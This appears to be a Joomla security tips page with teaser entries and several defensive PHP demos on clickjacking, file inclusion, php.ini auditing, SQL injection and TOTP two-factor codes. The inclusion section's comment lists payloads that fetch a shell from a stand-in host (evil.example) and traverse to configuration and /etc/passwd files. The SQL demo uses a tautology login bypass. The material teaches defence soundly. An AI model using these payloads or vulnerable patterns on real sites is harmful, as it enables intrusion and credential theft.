security

  • My MySQL database does not support UTF-8! Do I have a problem?

    If you search for the title of this tip you will find lots of hits. Actually, my last search returned 6.6 million hits! Apparently a lot of people are having problems with, or fears about, this subject. When I first published this tip, back in 2005, there was no such number of answers/references, and I think that this real flood of sites about this potential issue is not because a lot of people are having problems, but because more and more people are getting into building interactive sites.

    So, do you have a problem?

  • Other usual hacker tactics

    There are numerous other tactics that can be used to break into a computer system, and these usually involve discovering weaknesses or loopholes in the server software's defenses. When a programmer writes software that runs on a web server, he tries to make sure that the software cannot be abused - but it can be very difficult to foresee every eventuality; vandals and hackers are always pushing software to the limit and trying out operations which the software was not designed to handle, in an attempt to discover a way in.

  • Password strength checker - for free!

    It's one of the best kept "secrets" of Joomla 2.5+: there is a built-in password strength meter, ready to be used. And some are selling for good money, and others offering free plugins, to let you unleash the hidden power.

    But if you aren't afraid to get your hands dirty with some PHP code, here is how you can do it:

  • Patch your outdated Joomla installs

    As I write this, both Joomla 1.5 and 2.5 have long reached their EOL (End Of Life), and are not developed or supported anymore. This is a huge security risk, so the best advice here is to upgrade your Joomla site to the latest version. But what if you don't have the time/funds to do it right now?

  • Protect yourself from clickjacking hack

    Clickjacking is a browser security issue that affects a variety of browsers and platforms. No script has to run on the target site: the attacker loads your site in an invisible layer (typically a transparent iframe) on top of a page he controls, so a click on what looks like a harmless button actually lands on your site, hijacking the user's clicks. The unsuspecting user will perform this way actions they never intended to, from apparently harmless ones, such as following someone on Twitter, to really nasty things, like password or credit card information theft, and anything else you might (not want to) do on a web page. The defence is server-side: tell the browser, through the X-Frame-Options and Content-Security-Policy frame-ancestors response headers, that your pages may not be framed by other sites.
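
    To see the trick and the defence side by side, here is an added PHP demo (my own code, not code from this site or from Joomla) that plays both roles under PHP's built-in web server: a "victim" page with a sensitive button, and an "attacker" page that frames the victim page, fully transparent, over a decoy button. Adding protect=1 makes the victim page send the anti-framing headers, after which the browser refuses to render it inside the attacker's frame. The file name clickjack_demo.php, the port and the page layout are assumptions made for the example.

```php
<?php
// clickjack_demo.php - added example, not part of the original page or of Joomla.
// Run:   php -S 127.0.0.1:8080 clickjack_demo.php
// Open:  http://127.0.0.1:8080/?role=attacker            (the click lands on the victim page)
//        http://127.0.0.1:8080/?role=attacker&protect=1  (the frame is refused by the browser)
declare(strict_types=1);

/** Response headers that forbid framing, or allow only same-origin framing. */
function anti_clickjacking_headers(bool $allowSameOrigin = false): array
{
    return [
        // Legacy header, still honoured by every current browser.
        'X-Frame-Options: ' . ($allowSameOrigin ? 'SAMEORIGIN' : 'DENY'),
        // Modern equivalent; takes precedence where both are present.
        'Content-Security-Policy: frame-ancestors ' . ($allowSameOrigin ? "'self'" : "'none'"),
    ];
}

$role    = $_GET['role'] ?? 'victim';
$protect = isset($_GET['protect']);

if ($role === 'attacker') {
    // Attacker page: a decoy button, and the victim page stacked above it at opacity 0.
    $victimUrl = htmlspecialchars('/?role=victim' . ($protect ? '&protect=1' : ''), ENT_QUOTES);
    $page = <<<'HTML'
<!doctype html>
<title>Win a prize!</title>
<style>
  body    { margin: 0; }
  #decoy  { position: absolute; top: 20px; left: 20px; font-size: 20px; }
  /* Transparent frame on top of the decoy: the user's click goes to the victim page. */
  #victim { position: absolute; top: 0; left: 0; width: 400px; height: 200px;
            opacity: 0; z-index: 10; border: 0; }
</style>
<button id="decoy">Click to claim your prize</button>
<iframe id="victim" src="{{VICTIM}}"></iframe>
HTML;
    echo str_replace('{{VICTIM}}', $victimUrl, $page);
    exit;
}

// Victim page. Headers must be sent before any output. Both demo pages share one
// origin, so only DENY / 'none' blocks the frame here; SAMEORIGIN would still allow it.
if ($protect) {
    foreach (anti_clickjacking_headers() as $header) {
        header($header);
    }
}
$deleted = (($_POST['action'] ?? '') === 'delete');
?>
<!doctype html>
<title>Account settings</title>
<style> body { margin: 0; } </style>
<form method="post" action="/?role=victim<?= $protect ? '&amp;protect=1' : '' ?>">
  <button name="action" value="delete"
          style="position:absolute; top:20px; left:20px; font-size:20px">Delete my account</button>
</form>
<?php if ($deleted): ?>
  <p style="position:absolute; top:80px; left:20px">Account deleted (simulated).</p>
<?php endif; ?>
```

    On a real Joomla site you would normally choose SAMEORIGIN / 'self' rather than DENY, because parts of the CMS (the wrapper component, editor dialogs) frame pages of the same site; what must be refused is framing by other origins. The headers can equally be set in the web server configuration (for example an Apache Header directive) instead of in PHP; either way, check them with a HEAD request against the live site after deploying.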

  • reCaptcha stopped working

    While working on a new site I discovered that reCaptcha, which used to be a rock-solid part of the CMS since Joomla 1.7, stopped working. I spent a couple of hours googling around and checking and double-checking settings, just to discover that Google, in its infinite wisdom, has changed things again without notice. The problem affects all Joomla versions from 1.7.1 to 3.2.0.

  • Register Globals

    Many of you have probably already seen the red warning in Joomla's admin interface that you need to have PHP's Register Globals set to "off", otherwise your site is exposed to security threats (with it on, every request parameter silently becomes a PHP variable, so an attacker can preset variables a script expected to initialise itself).

    And also many of you have no clue how to do it...

    So, let's see what an average webmaster can do about this problem.

  • RFI/LFI

    Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to make a script on the web server include, and execute, a file fetched from a URL of the attacker's choice; in PHP this needs an include path built from user input and the allow_url_include setting turned on. Its pair, Local File Inclusion (LFI), is the same technique applied to files that already exist on the server: configuration files, log files into which the attacker has written PHP code, or files the hacker "planted" earlier on a site that has already been penetrated.
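
    As an added illustration (my own code, not the page's or Joomla's): the vulnerable include pattern in a comment, followed by a resolver that maps a request parameter to a file through a strict allow-list plus a realpath check. The demo constructs its own temporary pages directory and a fake configuration.php, so it runs offline; the file and parameter names are made up for the example.

```php
<?php
// Added example (not code from the original page or from Joomla): a vulnerable include
// contrasted with a hardened resolver. The demo creates its own temporary files.
declare(strict_types=1);

// VULNERABLE pattern found in countless templates and components:
//     include $_GET['page'] . '.php';
// ?page=http://evil.example/shell.txt%3F        -> RFI when allow_url_include is on
// ?page=../../configuration                    -> LFI of the site's configuration.php
// ?page=../../../../var/log/apache2/access.log -> LFI of a log the attacker poisoned

/**
 * Map a user-supplied page name to a file inside $pagesDir.
 * Returns the canonical path, or null if the request must be refused.
 */
function resolve_page(string $requested, string $pagesDir): ?string
{
    // 1. Allow-list the syntax: a short slug only. This alone rejects "../", "://",
    //    NUL bytes and the "%3F" trick, regardless of PHP version or ini settings.
    if (preg_match('/\A[a-z0-9_-]{1,40}\z/', $requested) !== 1) {
        return null;
    }
    // 2. Defence in depth: canonicalise and confirm the file really lies under $pagesDir
    //    (guards against symlinks, or a later relaxation of the regex).
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// --- Demo with constructed files in a temporary directory -------------------------
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/about.php', "<?php echo \"About page\\n\";\n");
file_put_contents($root . '/configuration.php', "<?php \$password = 'secret';\n");

$attempts = [
    'about',
    '../configuration',
    '../../../../etc/passwd',
    'http://evil.example/shell.txt?',
    "about\0",
];
foreach ($attempts as $requested) {
    $file = resolve_page($requested, $root . '/pages');
    printf("%-32s => %s\n", addcslashes($requested, "\0"),
        $file === null ? 'REJECTED' : 'include ' . basename($file));
    if ($file !== null) {
        include $file;   // only ever reached for a file inside pages/
    }
}

// Tidy up the constructed files.
unlink($root . '/pages/about.php');
unlink($root . '/configuration.php');
rmdir($root . '/pages');
rmdir($root);
```

    The regex does the real work; the realpath comparison is there so that a future "small" change to the regex does not silently reopen the hole. Independently of the code, keep allow_url_include off in php.ini: it is the switch that turns any LFI into an RFI.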

  • Secure your standalone scripts used in a Joomla site

    Joomla has everything you may need. Right? If you take a look at the Joomla Extensions site, you may agree with this. But, as always, there may be cases when the above statement is wrong. For a specific need the simplest approach may be to use a standalone script. You can solve the problem, apparently, by using Joomla's wrapper feature, and use your scripts as if they were part of your Joomla site. An almost perfect solution, you may think... but your scripts are directly accessible by their physical URL, not only through the Joomla interface, so none of Joomla's login, access level or session checks apply to them. What can you do about it?

    A lot. And surprisingly easily.

  • Server Settings

    Joomla specifies certain settings that are recommended for proper functioning of the system. A list of the recommended and actual settings is displayed when you install Joomla. One of the recommended settings is to have 'Display Errors' switched on. This is very useful when developing and debugging a site, but there is a security vulnerability in PHP (not Joomla, but the language in which Joomla was written) which may allow cross-site scripting attacks when the display errors option is enabled, if you have a script which produces an error. Displayed errors also leak file paths, query fragments and version details to anyone who can trigger one. Keep it on only while developing; on a live site switch display_errors off and turn log_errors on, so the diagnostics go to the log file instead of the visitor's browser.
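
    The settings discussed here and under Register Globals above can be checked with one small script. The following PHP audit is an added example, my own code and not Joomla's installer check; the directive list and the target values are my selection, mirroring the items Joomla's installer and admin warnings flag. Directives that no longer exist in the running PHP (register_globals and magic_quotes_gpc were removed in PHP 5.4) are reported as absent, which is the safe state.

```php
<?php
// Added example, not part of the original page and not Joomla's own check:
// audit a handful of php.ini directives that matter for a Joomla site.
declare(strict_types=1);

/**
 * Returns one row per directive: ['actual' => string, 'wanted' => 'On'|'Off', 'ok' => bool].
 * A directive the running PHP does not know (ini_get() === false) reports as "absent".
 */
function audit_php_settings(): array
{
    // true = should be On, false = should be Off (reviewer's selection, see lead-in)
    $wanted = [
        'display_errors'    => false, // leaks paths/queries, can reflect input into the page
        'log_errors'        => true,  // keep the diagnostics, but in the log file
        'register_globals'  => false, // request variables must not become PHP globals
        'magic_quotes_gpc'  => false, // half-baked escaping that breaks proper escaping
        'allow_url_include' => false, // the switch that turns LFI into RFI
        'expose_php'        => false, // do not advertise the PHP version in headers
    ];

    $rows = [];
    foreach ($wanted as $name => $shouldBeOn) {
        $raw = ini_get($name);
        if ($raw === false) {   // directive does not exist in this PHP build
            $rows[$name] = ['actual' => 'absent', 'wanted' => $shouldBeOn ? 'On' : 'Off', 'ok' => !$shouldBeOn];
            continue;
        }
        // ini values arrive as strings: "1", "On", "true" -> true; "", "0", "Off" -> false
        $isOn = filter_var($raw, FILTER_VALIDATE_BOOLEAN);
        $rows[$name] = [
            'actual' => $isOn ? 'On' : 'Off',
            'wanted' => $shouldBeOn ? 'On' : 'Off',
            'ok'     => $isOn === $shouldBeOn,
        ];
    }
    return $rows;
}

$allOk = true;
foreach (audit_php_settings() as $name => $row) {
    $allOk = $allOk && $row['ok'];
    printf("%-18s actual=%-7s wanted=%-4s %s\n",
        $name, $row['actual'], $row['wanted'], $row['ok'] ? 'OK' : 'FIX');
}
exit($allOk ? 0 : 1);
```

    Run it through the web server, not only from the command line: the CLI reads its own php.ini, which often differs from the one the web SAPI uses. Drop it into the site root under a random name, open it once in the browser, and delete it again. Where you cannot edit php.ini, mod_php honours php_flag lines in .htaccess (for example php_flag display_errors Off) and FastCGI setups honour a .user.ini in the site root.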

  • Special considerations to make your Joomla site secure

    Joomla, like most CMSs, excels at making it easy to manage a website. It offers a pretty easy way to manage web-based publishing, format management, history editing and version control, indexing, search and retrieval. Joomla has an impressive suite of features, but these features require some special considerations.

  • SQL Injection

    One popular and potentially devastating method of attack against Joomla-powered sites is SQL injection. Any web application that makes use of a database communicates with it using a special language known as Structured Query Language, or SQL. Joomla, by the way, stores its data in MySQL, an open source database server that speaks this language. Injection happens when text supplied by a visitor (a form field, a URL parameter, a cookie) is pasted into a query as if it were part of the SQL itself, so the visitor gets to rewrite the query.
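
    The following PHP example is added here and is neither code from this page nor from Joomla's database layer. It runs against an in-memory SQLite database through PDO, so no MySQL server is needed; the sample users and the plain-text passwords are constructed for the demo (Joomla stores hashes, which changes nothing about the injection). It shows a login query built by string concatenation being bypassed with the classic tautology payload, and the same query written with bound parameters refusing it.

```php
<?php
// Added example, not code from the original page or from Joomla. SQLite in memory
// through PDO; the injection works the same way against MySQL.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
// Constructed sample data; plain-text passwords only to keep the demo short.
$db->exec("INSERT INTO users (username, password) VALUES ('admin', 'hunter2'), ('editor', 'letmein')");

/** VULNERABLE: the query text is assembled from user input, so input becomes SQL. */
function login_vulnerable(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT username FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

/** HARDENED: bound parameters; the values travel separately from the query text. */
function login_safe(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('SELECT username FROM users WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// The classic tautology payload. Inside the concatenated query the WHERE clause reads
//   username = '' OR '1'='1' AND password = '' OR '1'='1'
// which is true for every row, so the first user (admin) is "logged in" without a password.
$payload = "' OR '1'='1";

var_dump(login_vulnerable($db, 'admin', 'hunter2'));   // a legitimate login
var_dump(login_vulnerable($db, $payload, $payload));   // the same function, bypassed
var_dump(login_safe($db, $payload, $payload));         // the payload is just a string here
var_dump(login_safe($db, 'editor', 'letmein'));        // legitimate logins still work
```

    Inside Joomla code the equivalent rule is to never concatenate raw request values into a query: pass every value through $db->quote() and every column or table name through $db->quoteName(), or use the query builder's bound values where the version you run supports them. Escaping by hand (addslashes, str_replace) is exactly the kind of "protection" that injection payloads are designed to slip past.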

  • Sucuri's Hacked Website Report 2017

    The most comprehensive analysis of trends in website security is finally out. There are a couple of interesting facts worth highlighting.

    Most important is something we expected: Joomla is emerging as the most secure CMS.

  • The pharma hack

    The Pharma Hack (or Blackhat SEO Spam Hack) is a very elaborate hack which often goes unnoticed by regular visitors, and by website owners, because it does an ingenious trick: it presents a different version of your site to the search engine bots. The site, for a long period of time, looks and behaves normally for regular visitors. This attack is very interesting because it is not visible to the normal user and the spam (generally about Viagra, Nexium, Cialis, etc.) only shows up if the user agent is Google's crawler (googlebot). Also, the infection is a bit tricky to remove and if not done properly will keep reappearing. It's one of the nastiest hacks you might have. We recommend hiring a specialist to remove it, because generally the infection reappears in no time after the site is "cleaned".

  • Two-factor authentication

    Also known as two-step authentication or two-step verification, two-factor authentication is an additional security option for online accounts to help keep them safe: besides the password (something you know) the login requires a second proof, typically a short-lived code generated on a device you own.
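
    The codes produced by authenticator apps follow the TOTP scheme (RFC 6238, built on HOTP from RFC 4226), which is what Joomla's two-factor plugins from 3.2 onwards are based on. Below is an added PHP implementation of that scheme, my own code and not Joomla's plugin, with a verifier that tolerates a little clock drift and returns the matched time step so the caller can block replay. The demo uses the reference secret from RFC 6238 (given here in the base32 form authenticator apps accept); everything else is constructed for the example.

```php
<?php
// Added example, not code from the original page or from Joomla: a minimal TOTP
// generator/verifier, the scheme behind authenticator-app codes. Needs PHP >= 5.6.3 for pack('J').
declare(strict_types=1);

/** Decode the base32 string (RFC 4648 alphabet) that authenticator apps accept. */
function base32_decode_str(string $b32): string
{
    $b32 = strtoupper(rtrim($b32, '='));
    if ($b32 === '') {
        throw new InvalidArgumentException('empty base32 secret');
    }
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567';
    $bits = '';
    foreach (str_split($b32) as $c) {
        $i = strpos($alphabet, $c);
        if ($i === false) {
            throw new InvalidArgumentException("invalid base32 character: $c");
        }
        $bits .= str_pad(decbin($i), 5, '0', STR_PAD_LEFT);
    }
    $out = '';
    foreach (str_split($bits, 8) as $byte) {
        if (strlen($byte) === 8) {   // drop the trailing padding bits
            $out .= chr(bindec($byte));
        }
    }
    return $out;
}

/** HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated. */
function hotp(string $secret, int $counter, int $digits = 6): string
{
    $hash   = hash_hmac('sha1', pack('J', $counter), $secret, true);
    $offset = ord($hash[19]) & 0x0f;
    $code   = ((ord($hash[$offset]) & 0x7f) << 24)
            | (ord($hash[$offset + 1]) << 16)
            | (ord($hash[$offset + 2]) << 8)
            |  ord($hash[$offset + 3]);
    return str_pad((string) ($code % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

/** TOTP (RFC 6238): HOTP with counter = floor(unix_time / step). */
function totp(string $secret, int $unixTime, int $step = 30): string
{
    return hotp($secret, intdiv($unixTime, $step));
}

/**
 * Verify a submitted code, tolerating +/- $window steps of clock drift.
 * Returns the matched counter, or null. Persist the returned counter per user and
 * reject any later code whose counter is not greater than the stored one: that is
 * what stops a code sniffed once from being replayed inside the window.
 * hash_equals() keeps the comparison constant-time.
 */
function totp_verify(string $secret, string $code, int $unixTime, int $window = 1, int $step = 30): ?int
{
    $counter = intdiv($unixTime, $step);
    for ($i = -$window; $i <= $window; $i++) {
        if (hash_equals(hotp($secret, $counter + $i), $code)) {
            return $counter + $i;
        }
    }
    return null;
}

// Demo with the RFC 6238 reference secret "12345678901234567890", base32-encoded.
$secret = base32_decode_str('GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ');
echo "code at T=59 (RFC 6238 Appendix B lists 287082 for SHA1, 6 digits): ", totp($secret, 59), "\n";
echo "same code submitted 20 s later is accepted: ", var_export(totp_verify($secret, '287082', 79) !== null, true), "\n";
echo "same code submitted 2 min later is rejected: ", var_export(totp_verify($secret, '287082', 180) === null, true), "\n";
echo "current code: ", totp($secret, time()), "\n";
```

    Two operational points follow from the code: the server clock must be right, since the code is a function of time and a drifting server rejects every legitimate code; and the secret must be stored with the same care as a password hash, because anyone who reads it can generate codes at will.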

  • Unresponsive WYSIWYG editor

    The WYSIWYG editors are great additions to Joomla, and we have lots of them around. They turn a casual user into a webmaster and can speed up the work of pros. But, sometimes, you find that you cannot enter text into the HTML editor, or click on the HTML editor's toolbar buttons: you are locked out of editing your content!

    What can be more annoying than being unable to edit your own site?

  • User groups

    By default, across all Joomla versions from Joomla 1.0 through Joomla 1.5 and Joomla 1.6 to Joomla 1.7, the basic structure of the default user groups is unchanged. The users are generally sorted into 3 main categories: the unregistered/not logged-in users, the registered users with frontend-only access, and the backend users. The exact names of these main groups vary across the different Joomla versions, but the default end-level groups are the same. The groups and their core permissions are as follows:

  • Virtual spring cleaning for your Joomla sites

    Websites take maintenance, and making a habit of performing a little spring cleaning each year can keep a business website running smoothly. The tips below do not apply to Joomla sites alone; any site can benefit from most of these tricks and tips.

  • Vulnerable extensions list

    Even most security-conscious Joomla webmasters aren't aware of the existence of this list, maintained on the Joomla docs site. All components with known security problems are listed there, and, very important to know, items that once appeared on the list aren't removed when the problem is fixed, because the large majority of Joomla webmasters don't upgrade their site as new versions of the add-ons they use come out. So it is worth checking: even if the components you use are listed in GREEN (aka fixed), you may run into trouble, because hackers know the list too and are proactively seeking Joomla sites using the insecure add-ons. So you can easily become a target even if you have the secure version...

    Bookmark this link!

    Vulnerable extensions list

  • When the Joomla site is offline, only Super Users can log in

    A client of mine asked this question: "How can I allow registered users to log in and see the site even in offline mode, without giving them Super user privileges?"